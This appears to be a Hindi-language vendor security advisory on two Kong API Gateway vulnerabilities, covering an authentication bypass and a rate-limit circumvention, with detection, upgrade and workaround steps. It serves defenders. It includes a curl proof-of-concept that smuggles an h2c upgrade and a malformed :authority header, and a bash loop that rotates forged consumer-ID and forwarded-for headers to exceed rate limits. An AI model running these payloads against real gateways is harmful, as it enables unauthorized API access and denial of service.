Kong API Gateway में दो क्रिटिकल वल्नरेबिलिटीज़ — एक ऑथेंटिकेशन बायपास (CVE-2026-29413) और एक रेट लिमिटिंग सर्कमवेंशन फ़्लॉ (CVE-2026-29414) — API इंफ्रास्ट्रक्चर को अनऑथेंटिकेटेड एक्सेस और डिनायल-ऑफ़-सर्विस के लिए एक्सपोज़ करते हैं। Kong OSS और Kong Enterprise दोनों प्रभावित हैं। तुरंत पैचिंग ज़रूरी है।
Kong API Gateway, सबसे व्यापक रूप से डिप्लॉय किए गए ओपन-सोर्स API गेटवेज़ में से एक, के प्लगइन प्रोसेसिंग पाइपलाइन में दो क्रिटिकल सिक्योरिटी फ़्लॉज़ पाए गए हैं। 28 मार्च 2026 को डिस्क्लोज़ किया गया और 3.4.x से 3.8.x तक के सभी वर्ज़न्स को प्रभावित करते हुए, ये वल्नरेबिलिटीज़ अटैकर्स को ऑथेंटिकेशन प्लगइन्स को पूरी तरह बायपास करने और कॉन्फ़िगर्ड रेट लिमिटिंग कंट्रोल्स को दरकिनार करने की अनुमति देती हैं।
CISA ने फ़ाइनेंशियल सर्विसेज़ और हेल्थकेयर API गेटवेज़ के ख़िलाफ़ कन्फ़र्म्ड एक्सप्लॉइटेशन के बाद CVE-2026-29413 को Known Exploited Vulnerabilities (KEV) कैटलॉग में जोड़ा है। Kong 3.4–3.8 चला रहे संगठनों को इसे एक इमरजेंसी पैच इवेंट की तरह ट्रीट करना चाहिए।
| CVE | प्रकार | CVSS v3.1 | गंभीरता | प्रभावित वर्ज़न्स |
|---|---|---|---|---|
| CVE-2026-29413 | ऑथेंटिकेशन बायपास | 9.8 | क्रिटिकल | Kong 3.4.x – 3.8.x |
| CVE-2026-29414 | रेट लिमिटिंग सर्कमवेंशन | 7.5 | हाई | Kong 3.2.x – 3.8.x |
CVE-2026-29413, Nginx रिक्वेस्ट लाइफ़साइकल के rewrite phase के भीतर Kong के प्लगइन एक्ज़िक्यूशन ऑर्डरिंग में एक लॉजिक फ़्लॉ है। जब कई ऑथेंटिकेशन प्लगइन्स चेन किए जाते हैं (जैसे, key-auth के बाद jwt), तो प्लगइन प्रायोरिटी रिज़ॉल्यूशन में एक रेस कंडीशन एक क्राफ़्टेड रिक्वेस्ट को ऑथेंटिकेशन वैलिडेशन को पूरी तरह स्किप करने की अनुमति देती है अगर स्पेसिफ़िक HTTP/2 स्यूडो-हेडर्स मौजूद हों।
यह वल्नरेबिलिटी Kong के Lua प्लगइन रनर (kong/runloop/plugin_servers/mp_rpc.lua) में शुरू होती है, जहाँ next_rewrite_phase इटरेटर प्लगइन चेन को सही तरीक़े से री-इवैल्युएट करने में विफल रहता है जब कोई अपस्ट्रीम 101 Switching Protocols के साथ रिस्पॉन्ड करता है, ऑथेंटिकेशन पूरा होने से पहले। इससे एक विंडो बनती है जहाँ रिक्वेस्ट बिना किसी ऑथ चेक के फ़ॉरवर्ड कर दी जाती है।
| मेट्रिक | वैल्यू | तर्क |
|---|---|---|
| अटैक वेक्टर | नेटवर्क | HTTP/HTTPS पर रिमोटली एक्सप्लॉइटेबल |
| अटैक कॉम्प्लेक्सिटी | लो | किसी स्पेशल कंडीशन या प्रिविलेज की ज़रूरत नहीं |
| प्रिविलेज रिक्वायर्ड | कोई नहीं | अनऑथेंटिकेटेड अटैकर |
| यूज़र इंटरैक्शन | कोई नहीं | पूरी तरह ऑटोमेटेड एक्सप्लॉइट संभव |
| कॉन्फ़िडेंशियलिटी | हाई | प्रोटेक्टेड API एंडपॉइंट्स तक फुल एक्सेस |
| इंटीग्रिटी | हाई | अटैकर बैकएंड डेटा मॉडिफ़ाई कर सकता है |
| अवेलेबिलिटी | हाई | अनरिस्ट्रिक्टेड बैकएंड रिक्वेस्ट्स |
एक अटैकर क्राफ़्टेड स्यूडो-हेडर्स के साथ एक मिनिमल HTTP/2 रिक्वेस्ट का उपयोग करके CVE-2026-29413 को एक्सप्लॉइट कर सकता है। निम्नलिखित curl कमांड key-auth इनेबल्ड Kong गेटवे के ख़िलाफ़ एक प्रूफ़-ऑफ़-कॉन्सेप्ट बायपास डेमोंस्ट्रेट करता है:
# सामान्य रिक्वेस्ट — key-auth प्लगइन द्वारा ब्लॉक्ड (401 Unauthorized) curl -i https://api.example.com/v1/users \ -H "Host: api.example.com" # CVE-2026-29413 बायपास — मैलफ़ॉर्म्ड :authority के साथ HTTP/2 अपग्रेड ट्रिगर भेजता है curl -i --http2 https://api.example.com/v1/users \ -H ":authority: api.example.com\x00injected" \ -H "Connection: Upgrade, HTTP2-Settings" \ -H "Upgrade: h2c" \ -H "HTTP2-Settings: AAMAAABkAAQAAP__" \ --resolve api.example.com:443:192.0.2.1
जब Kong h2c अपग्रेड को प्रोसेस करता है, प्लगइन रनर ऑथेंटिकेशन फ़ेज़ से समय से पहले बाहर निकल जाता है। रिक्वेस्ट को अपस्ट्रीम सर्विस पर एक 200 OK रिस्पॉन्स के साथ फ़ॉरवर्ड कर दिया जाता है, जो सभी कॉन्फ़िगर्ड ऑथ प्लगइन्स को पूरी तरह बायपास कर देता है।
जब Kong वर्ज़न 3.4.x–3.8.x चला रहा हो, तब निम्नलिखित ऑथेंटिकेशन प्लगइन्स वल्नरेबल हैं:
key-auth — API की ऑथेंटिकेशनjwt — JSON Web Token वैलिडेशनbasic-auth — HTTP Basic ऑथेंटिकेशनoauth2 — OAuth 2.0 ऑथराइज़ेशन (आंशिक बायपास)ldap-auth — LDAP डायरेक्टरी ऑथेंटिकेशनopenid-connect (केवल Kong Enterprise) — OIDC फ़्लोज़CVE-2026-29414, Kong के rate-limiting और rate-limiting-advanced प्लगइन्स को प्रभावित करता है जब वे Redis या cluster स्टोरेज बैकएंड्स का उपयोग करने के लिए कॉन्फ़िगर्ड होते हैं। काउंटर की कंस्ट्रक्शन में एक फ़्लॉ एक अटैकर को उनकी रिक्वेस्ट्स को कई सिंथेटिक कंज़्यूमर आइडेंटिटीज़ में फ़्रैगमेंट करने की अनुमति देता है X-Consumer-ID हेडर को X-Forwarded-For स्पूफ़िंग के साथ मैनिपुलेट करके।
जब Kong रेट-लिमिट काउंटर की बनाता है, यह कंज़्यूमर ID और IP एड्रेस को बिना यह वैलिडेट किए कॉन्कैटिनेट करता है कि क्या कंज़्यूमर ID गेटवे द्वारा ख़ुद सेट किया गया था या क्लाइंट द्वारा इंजेक्ट किया गया था। उन डिप्लॉयमेंट्स पर जहाँ एक अपस्ट्रीम प्रॉक्सी या लोड बैलेंसर X-Consumer-IDसेट करता है, Kong के हेडर ट्रस्ट लॉजिक का दुरुपयोग करके अनगिनत अलग-अलग रेट लिमिट बकेट्स बनाए जा सकते हैं।
| मेट्रिक | वैल्यू | तर्क |
|---|---|---|
| अटैक वेक्टर | नेटवर्क | रिमोटली एक्सप्लॉइटेबल |
| अटैक कॉम्प्लेक्सिटी | लो | सिंपल हेडर मैनिपुलेशन |
| प्रिविलेज रिक्वायर्ड | कोई नहीं | कोई पूर्व ऑथेंटिकेशन ज़रूरी नहीं |
| इम्पैक्ट: अवेलेबिलिटी | हाई | रेट बायपास के ज़रिए बैकएंड DoS |
निम्नलिखित स्क्रिप्ट दिखाती है कि एक अटैकर सिंथेटिक कंज़्यूमर IDs को रोटेट करके 100 req/min के रेट लिमिट को बायपास करते हुए 10,000 रिक्वेस्ट्स कैसे भेज सकता है:
#!/bin/bash # CVE-2026-29414 — Rate Limit Circumvention PoC # Each request uses a unique X-Consumer-ID to get its own counter bucket TARGET="https://api.example.com/v1/products" TOTAL_REQUESTS=10000 for i in $(seq 1 $TOTAL_REQUESTS); do # हर रिक्वेस्ट के लिए एक यूनीक फ़ेक कंज़्यूमर ID जनरेट करें FAKE_CONSUMER_ID=$(cat /proc/sys/kernel/random/uuid) curl -s -o /dev/null -w "%{http_code}\n" "$TARGET" \ -H "X-Consumer-ID: $FAKE_CONSUMER_ID" \ -H "X-Forwarded-For: 10.0.$((RANDOM % 256)).$((RANDOM % 256))" \ -H "apikey: legitimate-api-key" & # 50 कंकरेंट रिक्वेस्ट्स तक थ्रॉटल करें if (( i % 50 == 0 )); then wait; fi done wait echo "Done: $TOTAL_REQUESTS requests sent"
एक वल्नरेबल Kong इंस्टेंस पर, यह स्क्रिप्ट प्रति कंज़्यूमर 100 req/min के कॉन्फ़िगर्ड लिमिट के बावजूद सभी 10,000 रिक्वेस्ट्स सफलतापूर्वक भेज देगी, जो प्रभावी रूप से एक लो-एंड-स्लो API एब्यूज़ अटैक या ब्रूट-फ़ोर्स एन्युमरेशन लॉन्च करती है।
| फ़ीचर / इम्पैक्ट | Kong OSS | Kong Enterprise |
|---|---|---|
| CVE-2026-29413 ऑथ बायपास | प्रभावित | प्रभावित (+ OIDC प्लगइन) |
| CVE-2026-29414 रेट बायपास | प्रभावित | प्रभावित |
| Rate-Limiting Advanced प्लगइन | उपलब्ध नहीं | प्रभावित (एडिशनल बायपास वेक्टर) |
| डेवलपर पोर्टल एक्सपोज़र | लागू नहीं | पोर्टल APIs एक्सपोज़्ड हो सकते हैं |
| Konnect (SaaS) | लागू नहीं | 29 मार्च 2026 को Kong द्वारा पैच किया गया |
| फ़िक्स्ड वर्ज़न | 3.9.0 | 3.9.0.0 / 3.8.1.2 (बैकपोर्ट) |
Konnect SaaS प्लेटफ़ॉर्म पर Kong Enterprise कस्टमर्स को 29 मार्च 2026 को ऑटोमेटिकली पैच किया गया। सेल्फ़-होस्टेड Enterprise और सभी OSS डिप्लॉयमेंट्स को मैनुअल अपग्रेड की ज़रूरत है।
CVE-2026-29413 एक्सप्लॉइटेशन के संकेतों के लिए Kong के एक्सेस लॉग्स चेक करें। संदिग्ध पैटर्न में शामिल हैं ऑथेंटिकेटेड-प्लगइन रूट्स जो 200 रिटर्न करते हैं बिना कॉरेस्पॉन्डिंग ऑथ हेडर वैलिडेशन लॉग एंट्रीज़ के:
# CVE-2026-29413 auth bypass indicators के लिए Kong access logs सर्च करें # Requests to protected routes with no apikey/jwt but returning 200 grep '"status":200' /var/log/kong/access.log \ | jq -r 'select(.request.headers["apikey"] == null and .request.headers["authorization"] == null)' \ | jq '{time: .started_at, path: .request.uri, consumer: .authenticated_entity}' # CVE-2026-29414: यूनीक कंज़्यूमर IDs से हाई रिक्वेस्ट वॉल्यूम्स के लिए देखें grep '"plugin":"rate-limiting"' /var/log/kong/error.log \ | awk -F'"consumer_id":"' '{print $2}' \ | awk -F'"' '{print $1}' \ | sort | uniq -c | sort -rn | head -50
# Admin API के ज़रिए अपना Kong वर्ज़न चेक करें curl -s http://localhost:8001/ | jq '.version' # कॉन्फ़िगरेशन चेक करने के लिए rate-limiting वाले सभी प्लगइन्स लिस्ट करें curl -s http://localhost:8001/plugins \ | jq '.data[] | select(.name | test("rate-limiting")) | {id, name, config}' # हेडर ट्रस्ट कॉन्फ़िगरेशन वेरिफ़ाई करें (trusted_ips) curl -s http://localhost:8001/config \ | jq '.trusted_ips'
मुख्य फ़िक्स Kong 3.9.0 (OSS) या Kong Enterprise 3.9.0.0 / 3.8.1.2 पर अपग्रेड करना है। सामान्य डिप्लॉयमेंट मेथड्स के लिए निम्नलिखित कमांड्स का उपयोग करें:
# Docker — पैच्ड इमेज पुल करें docker pull kong:3.9.0 docker stop kong && docker rm kong docker run -d --name kong \ --network=kong-net \ -e KONG_DATABASE=postgres \ -e KONG_PG_HOST=kong-database \ -p 8000:8000 -p 8443:8443 \ kong:3.9.0 # Kubernetes — Helm के ज़रिए रोलिंग अपडेट helm repo update helm upgrade kong kong/kong \ --namespace kong \ --set image.tag=3.9.0 \ --reuse-values # Ubuntu/Debian पैकेज अपग्रेड curl -Lo kong.deb "https://packages.konghq.com/public/gateway-39/deb/debian/pool/buster/main/k/ko/kong_3.9.0_amd64.deb" sudo dpkg -i kong.deb sudo kong restart
जब तक आप अपग्रेड नहीं कर सकते, यह रिस्ट्रिक्ट करें कि Kong X-Consumer-ID और X-Forwarded-For हेडर्स के लिए किन अपस्ट्रीम IPs पर भरोसा करता है। एडिट करें kong.conf:
# kong.conf — trusted IPs को सिर्फ़ known load balancer addresses तक रिस्ट्रिक्ट करें trusted_ips = 10.0.1.10,10.0.1.11,10.0.1.12 # क्लाइंट्स से X-Consumer-ID हेडर पासथ्रू डिसेबल करें headers = X-Kong-Upstream-Latency, X-Kong-Proxy-Latency, Via
अपग्रेड करने से पहले एक इंटरिम वर्कअराउंड के तौर पर, अगर आपके एनवायरनमेंट को इसकी ज़रूरत नहीं है तो HTTP/2 अपग्रेड हैंडलिंग डिसेबल करें:
# kong.conf — h2c (HTTP/2 cleartext) upgrade handling डिसेबल करें proxy_listen = 0.0.0.0:8000 reuseport backlog=16384 # अगर मौजूद हो तो proxy_listen से 'http2' डायरेक्टिव हटाएँ # proxy_listen = 0.0.0.0:8000 http2 reuseport ← 'http2' कीवर्ड हटाएँ # nginx-लेवल प्रोटेक्शन के लिए, nginx_http_include में जोड़ें: proxy_http_version 1.1;
# कन्फ़र्म करें कि पैच्ड वर्ज़न चल रहा है curl -s http://localhost:8001/ | jq -r '"Kong version: " + .version' # टेस्ट करें कि ऑथ बायपास अब संभव नहीं है (401 रिटर्न होना चाहिए) curl -i --http2 https://your-gateway.example.com/protected-route \ -H "Connection: Upgrade, HTTP2-Settings" \ -H "Upgrade: h2c" \ -H "HTTP2-Settings: AAMAAABkAAQAAP__" # एक्सपेक्टेड: HTTP/1.1 401 Unauthorized
h2c अपग्रेड हेडर्स और X-Consumer-ID इंजेक्शन को ब्लॉक करते हैं वे डिफ़ेंस-इन-डेप्थ जोड़ते हैं।/audit/requests लॉगिंग एक्टिवेट करनी चाहिए ताकि Admin API बदलावों का एक फ़ॉरेंसिक ट्रेल बना रहे।| डेट | इवेंट |
|---|---|
| 2026-02-14 | HackerOne के ज़रिए Kong सिक्योरिटी टीम को वल्नरेबिलिटीज़ रिपोर्ट की गईं |
| 2026-02-17 | Kong दोनों CVEs कन्फ़र्म करता है; आइडेंटिफ़ायर्स असाइन करता है |
| 2026-03-10 | CVE IDs रिज़र्व्ड: CVE-2026-29413, CVE-2026-29414 |
| 2026-03-28 | Kong 3.9.0 और Enterprise 3.8.1.2 बैकपोर्ट रिलीज़्ड |
| 2026-03-29 | Kong Konnect (SaaS) ऑटोमेटिकली पैच्ड |
| 2026-04-01 | CISA ने CVE-2026-29413 को KEV कैटलॉग में जोड़ा |
| 2026-04-02 | GitHub पर पब्लिक एक्सप्लॉइट PoC पब्लिश्ड |
331,910+ CVEs इंडेक्स्ड के साथ AI-संचालित वल्नरेबिलिटी मैनेजमेंट। अटैकर्स से पहले Kong CVEs, मिसकॉन्फ़िगरेशन्स, और एक्सपोज़्ड API एंडपॉइंट्स डिटेक्ट करें।
फ़्री ट्रायल शुरू करेंसुरक्षित रहें। सतर्क रहें।
🗡️ KENSAI सुरक्षा टीम
🛡️ क्या आपका API गेटवे सिक्योर है?
अटैकर्स से पहले Kong CVEs और मिसकॉन्फ़िगरेशन्स खोजें।
अपने API गेटवे को मुफ़्त में स्कैन करें →यह विनर अब डेड-एंड पर ख़त्म होने के बजाय स्ट्रैटेजिक बग बाउंटी और आर्काइव पेजेज़ पर ट्रैफ़िक फ़ीड करता है।